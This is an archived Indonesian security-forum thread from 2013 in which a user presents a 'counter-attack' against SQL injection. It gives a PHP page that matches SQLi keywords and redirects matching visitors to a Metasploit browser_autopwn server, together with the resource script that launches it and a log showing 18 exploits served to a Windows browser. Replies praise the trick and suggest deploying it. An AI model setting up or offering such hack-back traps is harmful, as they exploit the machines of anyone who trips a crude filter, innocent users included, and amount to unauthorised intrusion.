+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Defensive Zone (https://www.indonesianbacktrack.or.id/forum/forum-173.html)
+--- Forum: Solutions & Patching (https://www.indonesianbacktrack.or.id/forum/forum-186.html)
+--- Thread: Share menangkal serangan sqli dengan metasploit (/thread-4460.html)
menangkal serangan sqli dengan metasploit - xnod_die - 04-24-2013
Hallo semua... kali ini saya ingin sharing , cara menangkal serangan sqli pada sebuah web,, menggunakan metasploit,,,,
Kebanyakan para attacker itu menggunakan windows,,,,
nah ini merupakan kesempatan bagi kita untuk melakukan serangan balik... :d
langsung aja nh ,,, maaf klo repost....
[hide]
buat script index.php
Code:
<?php
if (isset($_GET['xnod']) && preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $_GET['xnod']))
{
header('Location: http://192.168.1.100:4444');
}
?>
<html>
<body>
Silahkan dicoba
<a href="?xnod=2">test 1</a> - <a href="?xnod=2">test 2</a>- <a href="?xnod=6">test 3</a>
</body>
</html>sipp sekrang buat script biar lebih mudah gunain metasploit
kasih nama antisqli.rc
Code:
# cat <<EOF> antisqli.rc
> use auxiliary/server/browser_autopwn
> set LHOST 192.168.100
> set SRVPORT 4444
> set URIPATH /
> run
> EOFNah sekarang kita jalanin metasploit sambil nunggu si attacker menyerang,,, sambil ngopi2 + makan gorengan..
./msfconsole -q -r antisqli.rc
silahkan tunggu smpe ada log seperti ini
Code:
192.168.1.5:1205 [302]: /?xnod=6%27Code:
msf auxiliary(browser_autopwn) >
[*] 192.168.1.5 browser_autopwn - Handling '/'
[*] 192.168.1.5 browser_autopwn - Handling '/?sessid=TWljcm9zb2Z0IFdpbmRvd3M6Nzp1bmRlZmluZWQ6ZW4tVVM6eDg2OkZpcmVmb3g6MTIuMDo%3d'
[*] 192.168.1.5 browser_autopwn - JavaScript Report: Microsoft Windows:7:undefined:en-US:x86:Firefox:12.0:
[*] 192.168.1.5 browser_autopwn - Responding with 18 exploits[/hide]
regards xnod_die
RE: menangkal serangan sqli dengan metasploit - zee eichel - 04-24-2013
wuihh keren bro tehniknya .... ijin belajar ya
RE: menangkal serangan sqli dengan metasploit - m4k4ss4rh4ck3r - 04-24-2013
\m/\m/\m/\m/ngintips.dan nyimaks
RE: menangkal serangan sqli dengan metasploit - [H2] - 04-24-2013
hahaha. serangan balik ya om,
nice share deh .
+1 dari saya
RE: menangkal serangan sqli dengan metasploit - xombix - 04-24-2013
nice share om.
keren nih,bisa di buat sebagai jebakan juga
RE: menangkal serangan sqli dengan metasploit - Unregistered - 04-24-2013
wih mantep om..
bisa dijelasin ini maksudnya apa ?
by|select|\'|hex|substr|\s)/i', $_GET['xnod']))
wih mantep om..
bisa dijelasin ini maksudnya apa ?
by|select|\'|hex|substr|\s)/i', $_GET['xnod']))
RE: menangkal serangan sqli dengan metasploit - 5forA - 04-24-2013
wwiih,,... mantap ..... super ini omz,....
RE: menangkal serangan sqli dengan metasploit - alkaaf - 04-24-2013
wkwkwk semacam honeypot juga yah buat sqli injector.
nice share bro.
RE: menangkal serangan sqli dengan metasploit - xnod_die - 04-25-2013
(04-24-2013, 07:04 PM)Unregistered Wrote: wih mantep om..
bisa dijelasin ini maksudnya apa ?
by|select|\'|hex|substr|\s)/i', $_GET['xnod']))
wih mantep om..
bisa dijelasin ini maksudnya apa ?
by|select|\'|hex|substr|\s)/i', $_GET['xnod']))
iya pake fungsi preg_match() di php... misalkan link kita http://localhost/index.php?xnod=6
trus attacker mau nyerang pake tehnik sqli http://localhost/index.php?xnod=6+union+select+1,2,3--
nah fungsi preg_match() itu langsung mengalihkan ke IP jebakan,,,
RE: menangkal serangan sqli dengan metasploit - xsan-lahci - 04-25-2013
nice trick dude
buat di terapkan ke server training FWB keren nih wakakak